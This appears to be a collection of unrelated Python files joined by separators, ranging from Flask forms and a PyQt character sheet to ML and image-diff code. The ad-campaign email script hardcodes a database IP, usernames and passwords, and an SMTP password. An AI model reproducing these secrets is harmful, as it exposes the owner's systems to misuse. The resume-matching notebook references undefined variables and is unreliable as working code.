if len( np.where(self.Rigid == ori[ i+2 ])[0] ) > 0 :
Rig = Rig + 1;
# print( Rig )
AAFlexLoc = np.where(self.AAFlex == ori[i+1])[0]
# print( "ORI" )
# print( self.AAFlex[AAFlexLoc] )
if AAFlexLoc:
if Rig == 0:
FlQ[i] = self.Flx0R[AAFlexLoc]
if Rig == 1:
FlQ[i] = self.Flx1R[AAFlexLoc]
if Rig == 2:
FlQ[i] = self.Flx2R[AAFlexLoc]
# print( FlQ[i] )
# print( other[ i ] )
# print( self.Rigid )
# print( np.where(self.Rigid == other[ i ])[0] )
if len( np.where(self.Rigid == other[ i ])[0] ) > 0 :
Rig = 1
else :
Rig = 0
# print("Rig")
# print( Rig )
if len( np.where(self.Rigid == other[ i+2 ])[0] ) > 0 :
Rig = Rig + 1;
# print( Rig )
AAFlexLoc = np.where(self.AAFlex == other[i+1])[0]
# print( "OTHER" )
# print( self.AAFlex[AAFlexLoc] )
if AAFlexLoc:
if Rig == 0:
FlS[i] = self.Flx0R[AAFlexLoc]
if Rig == 1:
FlS[i] = self.Flx1R[AAFlexLoc]
if Rig == 2:
FlS[i] = self.Flx2R[AAFlexLoc]
# print( str(i) + "\t" + str( FlS[i] ) )
OriLoc = np.where(self.AAKD == ori[i+1])[0]
OtherLoc = np.where(self.AAKD == other[i+1])[0]
# print( "* "+str( i ) )
# print( ori[i+1] + " $ " + other[i+1] )
# print( str( OriLoc ) + " * " + str( OtherLoc ) )
if OriLoc >= 0 and OtherLoc >= 0 :
# print( "D:" + str( Dif ) )
Dif = Dif + pow(self.KDp[OriLoc]-self.KDp[OtherLoc], 2)
# print( LQ )
# print( "DIFF:" + str( Dif ) )
self.KD = float( Dif / LQ )
Dif = 0;
for i in range(3, LQ-3):
Query = 0.25*FlQ[i-3]+0.5*FlQ[i-2]+0.75*FlQ[i-1]+FlQ[i]+0.25*FlQ[i+3]+0.5*FlQ[i+2]+0.75*FlQ[i+1]
Subje = 0.25*FlS[i-3]+0.5*FlS[i-2]+0.75*FlS[i-1]+FlS[i]+0.25*FlS[i+3]+0.5*FlS[i+2]+0.75*FlS[i+1]
Dif = Dif + pow((Query/4)-(Subje/4),2)
self.Flx = Dif / LQ
# print( "F: " + str( self.Flx ) )
# print( )
|
from django.conf.urls import url
from .models import *
from . import views
from .views import *
#app_name = lms
urlpatterns = [
url(r'^$', views.adminhome, name= 'index'),
url(r'^logout/$', views.logout_page, name = 'logout'),
]
|
import os
os.system("cls")
# Python Iterators
mytuple = ("apple", "banana", "cherry", "orange", "mango", "carrot")
myit = iter(mytuple)
print(next(myit))
print(next(myit))
print(next(myit))
print(next(myit))
print(next(myit))
print(next(myit))
print()
mystr = "Benjamin"
myit = iter(mystr)
print(next(myit))
print(next(myit))
print(next(myit))
print(next(myit))
print(next(myit))
print(next(myit))
print(next(myit))
print(next(myit))
print()
# Looping Through an Iterator
mytuple = ("apple", "banana", "cherry", "orange", "mango", "carrot")
for x in mytuple:
print(x)
print()
mytuple1 = "carrot"
for x1 in mytuple1 :
print(x1)
print()
# Create an Iterator
class MyNumbers:
def __iter__(self):
self.a = 1
return self
def __next__(self):
x = self.a
self.a += 1
return x
myclass = MyNumbers()
myiter = iter(myclass)
print(next(myiter))
print(next(myiter))
print(next(myiter))
print(next(myiter))
print(next(myiter))
print(next(myiter))
print(next(myiter))
print(next(myiter))
print()
# StopIteration
class MyNumbers:
def __iter__(self):
self.a = 1
return self
def __next__(self):
if self.a <= 20:
x = self.a
self.a += 1
return x
else:
raise StopIteration
myclass = MyNumbers()
myiter = iter(myclass)
for x in myiter:
print(x)
|
def longestPalindrome(self, s):
"""
:type s: str
:rtype: str
"""
if not s or len(set(s)) == 1:
return s
if len(s) == 2:
if s[0] == s[1]:
return s
else:
return s[1]
res = s[0]
for i in range(len(s)):
if len(res) >= len(s) - i:
break
for j in range(len(s), i, -1):
if s[i:j] == s[i:j][::-1]:
if j - i > len(res):
res = s[i:j]
return res |
# -*- coding: utf-8 -*-
from flask_wtf import FlaskForm
from wtforms import (
HiddenField, SubmitField, BooleanField,
StringField, PasswordField, SelectField,
TextAreaField, RadioField, IntegerField,
SelectMultipleField
)
from wtforms.fields import (
DateField, TimeField, DecimalField,
URLField, EmailField,
)
from wtforms.validators import DataRequired, length
from dribdat.user.models import User, Project, Event, Role, Resource
from ..user.validators import (
UniqueValidator, event_date_check, event_time_check
)
from ..user import projectProgressList, resourceTypeList
from os import environ
from datetime import time, datetime
def get_time_note():
"""Construct a time zone message."""
tz = environ.get('TIME_ZONE', None)
aware_time = datetime.now().astimezone()
tzinfo = "The current server time is %s." % aware_time.strftime('%H:%M%z')
if tz is not None:
return "%s Time zone: %s" % (tzinfo, tz)
return tzinfo
class UserForm(FlaskForm):
"""User editing form."""
next = HiddenField()
id = HiddenField('id')
username = StringField(
u'Username',
[length(max=80), UniqueValidator(User, 'username'), DataRequired()])
email = EmailField(u'E-mail address', [length(max=80), DataRequired()])
fullname = StringField(u'Display name (optional)', [length(max=200)])
password = PasswordField(u'New password (optional)', [length(max=128)])
is_admin = BooleanField(u"Administrator", default=False)
active = BooleanField(u"Active", default=True)
submit = SubmitField(u'Save')
class UserProfileForm(FlaskForm):
"""User profile editing form."""
next = HiddenField()
id = HiddenField('id')
roles = SelectMultipleField(u'Roles', coerce=int)
webpage_url = URLField(u'Online profile', [length(max=128)])
my_story = TextAreaField(u'My story')
my_goals = TextAreaField(u'My goals')
submit = SubmitField(u'Save')
class EventForm(FlaskForm):
"""Event editing form."""
next = HiddenField()
id = HiddenField('id')
name = StringField(
u'Title',
[length(max=80), UniqueValidator(Event, 'name'), DataRequired()])
is_current = BooleanField(
u'Featured', default=False,
description=u'📣 Pin this event to the homepage.')
is_hidden = BooleanField(
u'Hidden', default=False,
description=u'🚧 This event is not shown on the homepage.')
lock_editing = BooleanField(
u'Freeze projects', default=False,
description=u'🔒 Prevent users editing any projects.')
lock_starting = BooleanField(
u'Lock projects', default=False,
description=u'🔒 Block starting new projects here.')
lock_resources = BooleanField(
u'Resource area', default=False,
description=u'💡 Used as toolbox, ignoring start and finish.')
lock_templates = BooleanField(
u'Templates', default=False,
description=u'💡 Contains templates, which can be used for new projects.')
starts_date = DateField(
u'Starting date', [event_date_check], default=datetime.now())
starts_time = TimeField(
u'Starting time',
[event_time_check], default=time(9, 0, 0),
description=get_time_note())
ends_date = DateField(u'Finish date', default=datetime.now())
ends_time = TimeField(u'Finish time', default=time(16, 0, 0))
summary = StringField(
u'Summary',
[length(max=140)],
description=u'A short tagline of the event, in max 140 characters')
hostname = StringField(
u'Hosted by',
[length(max=80)],
description=u'Organization responsible for the event')
location = StringField(
u'Located at',
[length(max=255)],
description=u'The event locale or virtual space')
location_lat = DecimalField(
u'Latitude', places=5, default=0,
description=u'The geo-coordinates (WGS84) of your event')
location_lon = DecimalField(
u'Longitude', places=5, default=0,
description=u'Tip: use map.geo.admin.ch or gps-coordinates.org')
hashtags = StringField(
u'Hashtags',
[length(max=255)],
description=u'Social media hashtags for this event')
description = TextAreaField(
u'Description',
description=u'Markdown and HTML supported')
logo_url = URLField(
u'Host logo link',
[length(max=255)],
description=u'Image hosted on a hotlinkable website - '
+ 'such as imgbox.com (max 688x130)')
gallery_url = URLField(
u'Gallery links',
[length(max=2048)],
description=u'Larger background image (max 1920x1080)')
webpage_url = URLField(
u'Home page link',
[length(max=255)],
description=u'Link to register or get more info about the event')
community_url = URLField(
u'Community link',
[length(max=255)],
description=u'To find others on a community forum or social media')
certificate_path = URLField(
u'Certificate link',
[length(max=1024)],
description='Include {username}, {email} or {sso} identifier '
+ 'to generate links to your participant certificate')
instruction = TextAreaField(
u'Instructions',
description=u'Shown to registered participants only - '
+ 'Markdown and HTML supported')
boilerplate = TextAreaField(
u'Quickstart guide',
description=u'Shown when starting a new project: Markdown and HTML supported')
community_embed = TextAreaField(
u'Code of conduct and community links',
description=u'Bottom of event and project page: Markdown, HTML and '
+ 'embedded scripts are supported')
custom_css = TextAreaField(
u'Custom stylesheet (CSS)',
description=u'For external CSS: @import url(https://...);')
submit = SubmitField(u'Save')
class ProjectForm(FlaskForm):
"""Project editing form."""
next = HiddenField()
id = HiddenField('id')
user_name = StringField(u'Started by')
event_id = SelectField(u'Event', coerce=int)
category_id = SelectField(u'Category', coerce=int)
progress = SelectField(u'Progress', coerce=int,
choices=projectProgressList())
name = StringField(
u'Title',
[length(max=80), UniqueValidator(Project, 'name'), DataRequired()])
summary = StringField(u'Short summary', [length(max=140)])
longtext = TextAreaField(u'Description')
autotext_url = URLField(
u'Readme',
[length(max=2048)],
description="Location from which to Sync content")
autotext = TextAreaField(u'Readme content')
webpage_url = URLField(u'Presentation or demo link', [length(max=2048)])
is_webembed = BooleanField(u'Embed contents of demo link', default=False)
hashtag = StringField(
u'Hashtags',
[length(max=255)],
description="Team channel or social media hashtag")
contact_url = URLField(u'Contact link', [length(max=2048)])
source_url = URLField(u'Source link', [length(max=2048)])
download_url = URLField(u'Download link', [length(max=2048)])
image_url = URLField(u'Image link', [length(max=255)])
logo_color = StringField(u'Custom color')
logo_icon = StringField(
u'Custom icon',
[length(max=20)],
description='https://fontawesome.com/v4/cheatsheet')
submit = SubmitField(u'Save')
class CategoryForm(FlaskForm):
"""Category editing form."""
next = HiddenField()
name = StringField(u'Name', [length(max=80), DataRequired()])
description = TextAreaField(u'Description',
description=u'Markdown and HTML supported')
logo_color = StringField(u'Custom color')
logo_icon = StringField(u'Custom icon', [length(max=20)],
description=u'fontawesome.com/v4/cheatsheet')
event_id = SelectField(u'Specific to an event, or global if blank',
coerce=int)
submit = SubmitField(u'Save')
class RoleForm(FlaskForm):
"""Role (user profile) editing form."""
next = HiddenField()
id = HiddenField('id')
name = StringField(
u'Name',
[length(max=80), UniqueValidator(Role, 'name'), DataRequired()])
submit = SubmitField(u'Save')
class ResourceForm(FlaskForm):
"""Resource form (NOT USED)."""
next = HiddenField()
id = HiddenField('id')
name = StringField(
u'Name',
[length(max=80), UniqueValidator(Resource, 'name'), DataRequired()])
project_id = IntegerField(u'Project id')
type_id = RadioField(u'Type', coerce=int, choices=resourceTypeList())
source_url = URLField(
u'Link',
[length(max=2048)], description=u'URL to get more information')
content = TextAreaField(
u'Comment',
description=u'Describe this resource in more detail')
progress_tip = SelectField(
u'Recommended at',
coerce=int,
choices=projectProgressList(True, True),
description=u'Progress level at which to suggest this to teams')
is_visible = BooleanField(u'Approved and visible to participants')
submit = SubmitField(u'Save')
|
import smtplib
import ssl
from string import Template
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import json
import requests
import sys
import re
import mysql.connector as mysql
from datetime import datetime, timedelta
import numpy as mp
# uomg@omg.com.gt OMG2018u
conn = None
def openConnection():
global conn
try:
conn = mysql.connect(host='3.95.117.169', database='MediaPlatforms',
user='omgdev', password='Sdev@2002!', autocommit=True)
except:
print("ERROR: NO SE PUEDO ESTABLECER CONEXION MYSQL.")
sys.exit()
def send(campanas, names):
cur = conn.cursor(buffered=True)
try:
body = ''
sender_email = "adops-noreply@omg.com.gt" # Enter your address
password = "OMGdev2019"
names = names[1:-1]
sqlCamping = """
select distinct username, c.CampaingID from omgguate.usuario u
inner join SysAdOps.RolsUsers ru on ru.UserID = u.idusuario
inner join SysAdOps.Rols r on r.RolID = ru.RolID
inner join mfcgt.mfcasignacion asg on asg.idusuario = u.idusuario
inner join accountxmarca am on am.marca = asg.idmarca
inner join Accounts a on a.AccountsID = am.account
inner join Campaings c on c.AccountsID = a.AccountsID
where c.CampaingID in ({})
order by username;
""".format(names)
cur.execute(sqlCamping,)
resultscon = cur.fetchall()
correo = resultscon[0][0]
last = resultscon[len(resultscon)-1][0]
for res in resultscon:
if res[0] != correo or res[0] == last:
html = """\
<html>
<body>
<p>Hola,<br>
Listado de Camapañas<br>
</p>
<table style="width:100%; border-collapse: collapse;" >
<tr>
<th style="border:1px solid black;padding: 10px;" >Cuenta</th>
<th style="border:1px solid black;padding: 10px;">Marca</th>
<th style="border:1px solid black;padding: 10px;">Medio</th>
<th style="border:1px solid black;padding: 10px;">Nombre Camapaña</th>
<th style="border:1px solid black;padding: 10px;">Resultado Presupuesto</th>
<th style="border:1px solid black;padding: 10px;">Resutlado KPI</th>
<th style="border:1px solid black;padding: 10px;">Presupuseto%</th>
<th style="border:1px solid black;padding: 10px;">KPI%</th>
<th style="border:1px solid black;padding: 10px;">Presupuseto</th>
<th style="border:1px solid black;padding: 10px;">KPI</th>
</tr>
{}
</table>
</body>
</html>
""".format(body)
body = MIMEText(
html, 'html') # convert the body to a MIME compatible string
receiver_email = correo
msg = MIMEMultipart()
msg['From'] = 'adops-noreply@omg.com.gt'
msg['To'] = correo
msg['Subject'] = 'Listado de Campañas ' + str(datetime.now())
msg.attach(body)
server = smtplib.SMTP('smtp.office365.com', 587)
server.ehlo()
server.starttls()
server.login(sender_email, password)
#server.sendmail(sender_email, receiver_email, msg.as_string())
body = ''
correo = res[0]
for cam in campanas:
if cam[0] == res[1]:
body = body + '<tr style="border:1px solid black;padding: 10px;"> '
body = body + '<td>{}</td>'.format(cam[1])
body = body + '<td>{}</td>'.format(cam[2])
body = body + '<td>{}</td>'.format(cam[3])
body = body + '<td>{}</td>'.format(cam[4])
body = body + '<td>{}</td>'.format(cam[5])
body = body + '<td>{}</td>'.format(cam[6])
body = body + '<td>{}</td>'.format(cam[7])
body = body + '<td>{}</td>'.format(cam[8])
body = body + '<td>{}</td>'.format(cam[9])
body = body + '<td>{}</td>'.format(cam[10])
body = body + '</tr>'
break
except Exception as e:
print(e)
else:
print(datetime.now())
def CampaingsReview(conn):
cur = conn.cursor(buffered=True)
sqlCamping = """
select dc.nombre as Account, dc.id idcliente,m.id idmarca ,c.CampaingID CampaingID, a.Media Media, c.Campaingname Campaingname, round(sum(distinct d.Cost),2) as 'InversionConsumida', date_format(c.StartDate, '%d/%m/%Y') StartDate , m.nombre as Marca,
date_format(c.EndDate,'%d/%m/%Y') EndDate , SUBSTRING_INDEX(SUBSTRING_INDEX(c.Campaingname, '_', 11),'_',-1) as 'PresupuestoPlan',SUBSTRING_INDEX (SUBSTRING_INDEX(c.Campaingname, '_', 13),'_',-1) KPIPlanificado,
md.Nombre KPI,ifnull(sum(distinct d.result),0) 'KPIConsumido',c.Campaignstatus State,m.nombre Marca ,dc.nombre Cliente,date_format(now(),'%M') mes,
'0' as 'TotalDias','0' as 'DiasEjecutados','0' as 'DiasPorservir', "0" as 'PresupuestoEsperado',"0" as 'PorcentajePresupuesto',
"0" as 'PorcentajeEsperadoV',"0" as 'PorcentajeRealV',"0" as 'KPIEsperado',"0" as 'PorcentajeKPI', "0" as 'PorcentajeEsperadoK',"0" as 'PorcentajeRealK', "0" as 'EstadoKPI', "0" as 'EstadoPresupuesto'
from dailycampaing d
inner join Campaings c on c.CampaingID = d.CampaingID
inner join Accounts a on c.AccountsID = a.AccountsID
inner join accountxmarca am on am.account = a.AccountsID
inner join mfcgt.mfcasignacion asg on asg.idmarca = am.marca
inner join mfcgt.dmarca m on am.marca = m.id
inner join mfcgt.dcliente dc on dc.id = m.idcliente
inner join modelocompra md on md.abr = SUBSTRING_INDEX (SUBSTRING_INDEX(c.Campaingname, '_', 14),'_',-1)
where c.Campaignstatus in ('ACTIVE','enabled') and asg.idusuario = {} and c.EndDate > '{}'
group by d.CampaingID;
"""
try:
campanas = []
campananames = ''
print(datetime.now())
cur.execute(sqlCamping,)
resultscon = cur.fetchall()
for row in resultscon:
Nomenclatura = row[3]
searchObj = re.search(r'([0-9,.]+)_(GT|CAM|RD|US|SV|HN|NI|CR|PA|RD|PN|CHI|HUE|PR)_([a-zA-ZáéíóúÁÉÍÓÚÑñ\s0-9-/.+&]+)_([a-zA-Z0-9-/.+&]+)_([a-zA-ZáéíóúÁÉÍÓÚÑñ0-9-/.+&0-9]+)_([a-zA-ZáéíóúÁÉÍÓÚÑñ0-9-/.+&0-9]+)_([a-zA-ZáéíóúÁÉÍÓÚÑñ0-9-/.+&0-9]+)_([a-zA-Z-/.+]+)_([a-zA-ZáéíóúÁÉÍÓÚÑñ.+0-9]+)_(ENE|FEB|MAR|ABR|MAY|JUN|JUL|AGO|SEP|OCT|NOV|DIC)_(2019|19|20|2020)_([0-9,.]+)_(BA|AL|TR|TRRS|TRRRSS|IN|DES|RV|CO|MESAD|LE)_([0-9,.]+)_(CPM|CPMA|CPVI|CPC|CPI|CPD|CPV|CPCo|CPME|CPE|PF|RF|MC|CPCO|CPCO)_([0-9.,]+)_([a-zA-Z-/áéíóúÁÉÍÓÚÑñ+&0-9]+)_([a-zA-Z-/áéíóúÁÉÍÓÚÑñ+&0-9]+)_([a-zA-Z-/áéíóúÁÉÍÓÚÑñ+&0-9]+)_([0-9,.-]+)?(_B-)?(_)?([0-9.,]+)?(_S-)?(_)?([0-9.,]+)?(\(([0-9.)])\))?(/[0-9].+)?', Nomenclatura, re.M | re.I)
if searchObj:
if row[5] != '0000-00-00' and row[6] != '0000-00-00':
Start = datetime.strptime(row[5], "%d/%m/%Y")
End = datetime.strptime(row[6], "%d/%m/%Y")
TotalDias = End - Start
DiasEjectuados = datetime.now() - Start
DiasPorservir = End - datetime.now()
if TotalDias.days > 0:
porcentDay = DiasEjectuados.days / \
((TotalDias.days) + 1)
PresupuestoEsperado = round(float(row[7]) * porcentDay, 2)
if float(row[7]) > 0:
PorcentajeEsperadoV = round(
float(PresupuestoEsperado) / float(row[7]), 2)
PorcentajeRealV = round(
float(row[4]) / float(row[7]), 2)
PorcentajePresupuesto = PorcentajeRealV - 1
KPIEsperado = round(float(row[8]) * porcentDay, 2)
if float(row[8]) > 0:
PorcentajeEsperadoK = round(
float(KPIEsperado) / float(row[8]), 2)
PorcentajeRealK = round(
float(row[10]) / float(row[8]), 2)
PorcentajeKPI = PorcentajeRealK - 1
TotalDias = TotalDias.days
DiasEjectuados = DiasEjectuados.days
DiasPorservir = DiasPorservir.days + 1
EstadoPresupuesto = 0
EstadoKPI = 0
if porcentDay <= 0.25:
if abs(int(PorcentajePresupuesto)) <= 0.15:
EstadoPresupuesto = 1
if abs(int(PorcentajeKPI)) <= 0.15:
EstadoKPI = 1
elif porcentDay > 0.25 and porcentDay <= 0.50:
if abs(int(PorcentajePresupuesto)) <= 0.10:
EstadoPresupuesto = 1
if abs(int(PorcentajeKPI)) <= 0.10:
EstadoKPI = 1
elif porcentDay > 0.50 and porcentDay <= 0.85:
if abs(int(PorcentajePresupuesto)) <= 0.05:
EstadoPresupuesto = 1
if abs(int(PorcentajeKPI)) <= 0.05:
EstadoKPI = 1
elif porcentDay > 0.85:
if abs(int(PorcentajePresupuesto)) <= 0.01:
EstadoPresupuesto = 1
if abs(int(PorcentajeKPI)) <= 0.01:
EstadoKPI = 1
if EstadoPresupuesto == 0 and EstadoKPI == 1:
campana = (row[1], row[0], row[12], row[2], row[3], 'Estado Presupuesto Malo', 'Estado KPI Bueno', str(round(float(
PorcentajePresupuesto))), str(round(float(PorcentajeKPI), 2)), str(round(float(row[4]), 2)), str(round(float(row[8]), 2)))
campananames = campananames + ',' + row[1]
elif EstadoPresupuesto == 1 and EstadoKPI == 0:
campana = (row[1], row[0], row[12], row[2], row[3], 'Estado Presupuesto Bueno', 'Estado KPI Malo', str(round(float(
PorcentajePresupuesto))), str(round(float(PorcentajeKPI), 2)), str(round(float(row[4]), 2)), str(round(float(row[8]), 2)))
campananames = campananames + ',' + row[1]
elif EstadoPresupuesto == 0 and EstadoKPI == 0:
campana = (row[1], row[0], row[12], row[2], row[3], 'Estado Presupuesto Malo', 'Estado KPI Malo', str(round(float(
PorcentajePresupuesto))), str(round(float(PorcentajeKPI), 2)), str(round(float(row[4]), 2)), str(round(float(row[8]), 2)))
campananames = campananames + ',' + row[1]
campanas.append(campana)
if campanas:
send(campanas, campananames)
except Exception as e:
print(e)
finally:
print(datetime.now())
if __name__ == '__main__':
openConnection()
CampaingsReview(conn)
conn.close()
|
from Character import *
from Creator import *
from page1 import *
from page2 import *
from page3 import *
from WeaponWidget import *
#from LevelUp import *
from random import *
from Races import *
from Classes import *
from Backgrounds import *
from Feats import *
from Features import *
from Armor import *
from Weapons import *
from Items import *
import images
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import sys
import os
import ctypes
FILE_ATTRIBUTE_HIDDEN = 0x02
if os.name != 'nt':
path = r'.Characters'
else:
path = r'Characters'
if not os.path.exists(path):
os.makedirs(path)
if os.name == 'nt':
ret = ctypes.windll.kernel32.SetFileAttributesW(path,FILE_ATTRIBUTE_HIDDEN)
if not ret:
raise ctypes.WinError()
class characterSelect(QWidget):
def __init__(self):
super().__init__()
f = QFont()
f.setFamily('URW Chancery L')
f.setPointSize(16)
self.icon = QIcon(':/icon.png')
self.name = ''
self.le = QLineEdit()
self.le.setPlaceholderText('Character Name')
self.le.setAlignment(Qt.AlignCenter)
self.le.setFont(f)
self.btn = QPushButton('Done')
self.btn.setFont(f)
self.layout = QVBoxLayout(self)
self.initUI()
def initUI(self):
self.setWindowTitle('Character Select')
self.setWindowIcon(self.icon)
self.layout.addWidget(self.le)
self.layout.addWidget(self.btn)
self.btn.clicked.connect(self.setName)
self.show()
self.center()
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def setName(self):
self.name = self.le.text()
self.close()
class CharacterSheet(QMainWindow):
def __init__(self,char):
super().__init__()
self.char = char
self.title = 'Character Sheet'
self.window = QTabWidget()
self.setCentralWidget(self.window)
self.page1 = CharacterPage(char)
self.page2 = SpellsPage(char)
self.page3 = NotesPage(char)
self.icon = QIcon(':/icon.png')
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setWindowIcon(self.icon)
self.window.addTab(self.page1, 'Character')
self.window.addTab(self.page2, 'Spellcasting')
self.window.addTab(self.page3, 'Notes & Misc')
clf = QFont()
clf.setFamily('URW Chancery L')
clf.setPointSize(20)
self.window.setFont(clf)
self.show()
self.center()
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
if __name__ == '__main__':
app = QApplication(sys.argv)
first = characterSelect()
app.exec_()
Player = Character(str(first.name),path)
if Player.getLevel() == 0:
second = characterCreator(Player)
app.exec_()
sheet = CharacterSheet(Player)
app.exec_()
Player.CLOSE()
sys.exit() |
import cv2, logging
import numpy as np
import pprint as pp
from Pipeline.Model.CamShot import CamShot
from Pipeline.Model.ProcessingResult import ProcessingResult
from Common.CommonHelper import CommonHelper
from Processors.Processor import Processor
from Pipeline.Model.PipelineShot import PipelineShot
class DiffCamShot:
def __init__(self):
# self.Result = ProcessingResult()
# self.Result.Summary = {}
self.log = logging.getLogger("PROC:DIFF") # :{shot.filenameWithoutExtension}
# self.shot = ctx.Shot
# self.originalShot = ctx.OriginalShot
# self.originalShots = ctx.OriginalShots
# self.shots = ctx.Shots
self.helper = CommonHelper()
def Process(self, pShot: PipelineShot, others: []):
#self.Result.Shot = self.originalShot.Copy();
pShot.Metadata["DIFF"] = {}
mask1 = self.DiffMask(pShot, others[0])
mask2 = self.DiffMask(pShot, others[1])
maskMean = self.Merge(mask1, mask2, lambda x, y: x//2 + y//2) # difference on any shot
cntsMean = self.ContoursByMask(maskMean, pShot)
self.DrawContours(pShot.Shot, cntsMean, color=(0, 180, 180))
maskMin = self.Merge(mask1, mask2, lambda x, y: min(x, y)) # only difference with two others
cntsMin = self.ContoursByMask(maskMin, pShot, 'Diff')
self.DrawContours(pShot.Shot, cntsMin, thickness=2)
self.DrawBoxes(pShot, cntsMin)
def RemoveZones(self, image):
#image_timestamp = image[:22, :230]
image[:22, :230] = 0 # remove timestamp
return image
def ContoursByMask(self, mask, pShot, summaryName = ''):
cnts, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = sorted(cnts, key=lambda cnt: cv2.contourArea(cnt), reverse=True)
areas = [cv2.contourArea(c) for c in cnts]
areasStr = [str(a) for a in areas]
totalArea = sum(cv2.contourArea(c) for c in cnts)
if summaryName != '':
pShot.Metadata['DIFF'][summaryName] = {}
pShot.Metadata['DIFF'][summaryName]['TotalArea'] = totalArea
pShot.Metadata['DIFF'][summaryName]['Areas'] = areas
pShot.Metadata['DIFF'][summaryName]['Count'] = len(cnts)
self.log.debug(f'{self.helper.Progress(totalArea, 2.5e4)} Contours {summaryName}: {len(cnts)}. Total contours area : {totalArea} ({", ".join(areasStr)})')
return cnts
def Merge(self, arr1, arr2, func):
result = arr1.copy()
for x in range(len(arr1)):
for y in range(len(arr1[x])):
result[x, y] = func(arr1[x, y], arr2[x, y])
return result
def DrawContours(self, shot, contours, color=(0, 255, 255), thickness=1):
cv2.drawContours(shot.GetImage(), contours, -1, color, thickness)
def DrawBoxes(self, pShot: PipelineShot, contours):
pShot.Metadata['DIFF']['boxes'] = []
for c in contours[0:3]:
area = int(cv2.contourArea(c))
(x, y, w, h) = cv2.boundingRect(c)
cv2.rectangle(pShot.Shot.GetImage(), (x, y), (x + w, y + h), (0, 255, 0), 1, 8)
cv2.putText(pShot.Shot.GetImage(), str(area // 100), (x, y-3), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2, cv2.LINE_AA)
pShot.Metadata['DIFF']['boxes'].append({
'profile_proportion': round(h/w,2),
'center': [x + w//2, y + h//2],
'area': area
})
def DiffMask(self, pShot: PipelineShot, other: PipelineShot):
image1 = self.RemoveZones(pShot.OriginalShot.GrayImage())
image2 = self.RemoveZones(other.OriginalShot.GrayImage())
absdiff = cv2.absdiff(image1, image2)
gausian = cv2.GaussianBlur(absdiff, (5, 5), 0)
_, thresh = cv2.threshold(gausian, 40, 255, cv2.THRESH_BINARY)
dilate = cv2.dilate(thresh, np.ones((10, 10), np.uint8))
return dilate
class DiffContoursProcessor(Processor):
def __init__(self):
super().__init__("DIFF")
def ProcessItem(self, pShot: PipelineShot, ctx: dict):
others = ctx['items'].copy()
others.remove(pShot)
super().ProcessItem(pShot, others)
diff = DiffCamShot()
return diff.Process(pShot, others)
|
# coding: utf-8
# In[52]:
import sys,os
import numpy as np
import nltk as nt
import docx
from nltk.corpus import stopwords
import glob,os
import warnings
warnings.filterwarnings("ignore")
import pandas as pd
import glob,os, itertools
# In[53]:
import re, math
from collections import Counter
WORD = re.compile(r'\w+')
def get_cosine(vec1, vec2):
intersection = set(vec1.keys()) & set(vec2.keys())
numerator = sum([vec1[x] * vec2[x] for x in intersection])
sum1 = sum([vec1[x]**2 for x in vec1.keys()])
sum2 = sum([vec2[x]**2 for x in vec2.keys()])
denominator = math.sqrt(sum1) * math.sqrt(sum2)
if not denominator:
return 0.0
else:
return float(numerator) / denominator
def text_to_vector(text):
words = WORD.findall(text)
return Counter(words)
vector1 = text_to_vector(text1)
vector2 = text_to_vector(text2)
cosine = get_cosine(vector1, vector2)
# In[54]:
# reading data scientist JD
f = open("Data_Scientist_JD.txt","r")
Data_Science_JD = f.read()
Data_Science_JD = text_to_vector(Data_Science_JD)
# creating 2 lists
person = []
score = []
# reading the resumes
for file in glob.glob('resumes\\*.txt'):
#print(file)
files = file.split('\\')[6].split('.')[0]
f1 = open(file,"r")
resume = f1.read()
resume_skills = resume.split('Skills:')[1]
resume_skills = text_to_vector(resume_skills)
#resume = process(filepath)
Data_Scientist = get_cosine(resume_skills,Data_Science_JD)
person.append(files)
score.append(Data_Scientist)
# In[55]:
final_score = pd.DataFrame(
{'Person': person,
'Percentage_Match': score
})
final_score['Percentage_Match'] = final_score['Percentage_Match']*100
# In[50]:
final_score.to_csv('score.csv')
# In[56]:
final_score
# In[57]:
os.getcwd()
# In[ ]:
|
#import the necessary packages
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.datasets import make_blobs
import matplotlib.pyplot as plt
import numpy as np
def sigmoid_activation(x):
return 1.0/(1 + np.exp(-x))
def predict(X, W):
preds = X.dot(W)
#Since we're still doing a binary classifier, use step function
preds[preds <=0.5] = 0
preds[preds >0.5] = 1
return preds
#Generator to get data from the X and Y elements
def next_batch(X, y, batchSize):
for i in range(0, X.shape[0], batchSize):
yield(X[i:i + batchSize], y[i:i+batchSize])
#Generate 2 cllass classification problem with 1000 data points where each data point is a 2D feature vector.
(X, y) = make_blobs(n_samples=1000, n_features=2, centers=2, cluster_std=1.5, random_state=1)
y = y.reshape((y.shape[0], 1))
#Bias trick by adding a column of 1's in front of the X array
X = np.c_[np.ones(X.shape[0]), X]
#Split data into train test
(trainX, testX, trainY, testY) = train_test_split( X, y, test_size = 0.5, random_state=42)
print("[INFO] training...")
#Initialize our weight matrix and list of losses for future examination
W = np.random.randn(X.shape[1], 1)
losses = []
epochs = 100
batch_size = 32
alpha = 0.001
#learn
for epoch in range(epochs):
epochLoss = []
for(batchX, batchY) in next_batch(trainX, trainY, batch_size):
#perform SGD for the batch
preds = sigmoid_activation(batchX.dot(W))
#the error
errors = preds - batchY
epochLoss.append(np.sum(errors**2))
#the gradient descent step
gradient = batchX.T.dot(errors)
W = W - (alpha * gradient)
#Calculate the loss over all the batches in an epoch.
loss = np.average(epochLoss)
losses.append(loss)
#print every 5 epochs
if epoch ==0 or (epoch+1)%5==0:
print("[INFO] epoch = {}, loss = {:.7f}".format(int(epoch+1), loss))
#evaluate our model
print("[INFO] evaluating...")
preds = predict(testX, W)
print(classification_report(testY, preds))
#plot the testing classification data
plt.style.use("ggplot")
plt.figure()
plt.title("Data")
plt.scatter(testX[:, 1], testX[:, 2], marker = "o",c = testY[:,0], s = 30)
#Plot the loss over time
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), losses)
plt.title("Training Loss")
plt.xlabel("Epoch #")
